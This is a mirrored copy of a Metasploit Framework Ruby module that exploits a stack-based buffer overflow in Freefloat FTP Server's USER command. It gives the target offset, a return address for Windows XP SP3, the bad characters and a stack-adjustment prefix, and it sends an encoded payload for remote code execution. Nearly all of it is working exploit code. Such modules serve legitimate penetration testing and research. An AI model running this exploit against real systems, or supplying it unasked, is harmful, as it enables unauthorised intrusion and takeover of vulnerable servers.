CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ftp/freefloatftp_user.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Ftp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'			 => 'Free Float FTP Server USER Command Buffer Overflow',

14
      'Description'	 => %q{

15
          Freefloat FTP Server is prone to an overflow condition. It

16
        fails to properly sanitize user-supplied input resulting in a

17
        stack-based buffer overflow. With a specially crafted 'USER'

18
        command, a remote attacker can potentially have an unspecified

19
        impact.

20
      },

21
      'Platform'		 => 'win',

22
      'Author'		 =>

23
        [

24
          'D35m0nd142', # Original exploit

25
          'Doug Prostko <dougtko[at]gmail.com>' # MSF module

26
        ],

27
      'License'		 => MSF_LICENSE,

28
      'References'	 =>

29
        [

30
          [ 'OSVDB', '69621'],

31
          [ 'EDB', '23243']

32
        ],

33
      'Privileged'	 => false,

34
      'Payload'		 =>

35
        {

36
          'Space'          => 444,

37
          'DisableNops'    => true,

38
          'BadChars'       => "\x00\x0a\x0d",

39
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500

40
        },

41
      'Targets'		=>

42
        [

43
          [ 'FreeFloat / Windows XP SP3',

44
            {

45
              'Ret' => 0x77c35459 , # push esp; ret - mscvrt.dll

46
              'Offset'   => 230

47
            }

48
          ],

49
        ],

50
      'DefaultTarget' => 0,

51
      'DisclosureDate' => '2012-06-12'))

52
  end

53


54
  def check

55
    connect

56
    disconnect

57
    if (banner =~ /FreeFloat/)

58
      # Software is never updated, so if you run this you're f*cked.

59
      return Exploit::CheckCode::Vulnerable

60
    else

61
      return Exploit::CheckCode::Safe

62
    end

63
  end

64


65
  def exploit

66
    connect

67
    buf = rand_text(target['Offset'])

68
    buf << [ target['Ret'] ].pack('V')

69
    buf << rand_text(8)

70
    buf << payload.encoded

71
    send_user(buf)

72
    disconnect

73
  end

74
end

75


76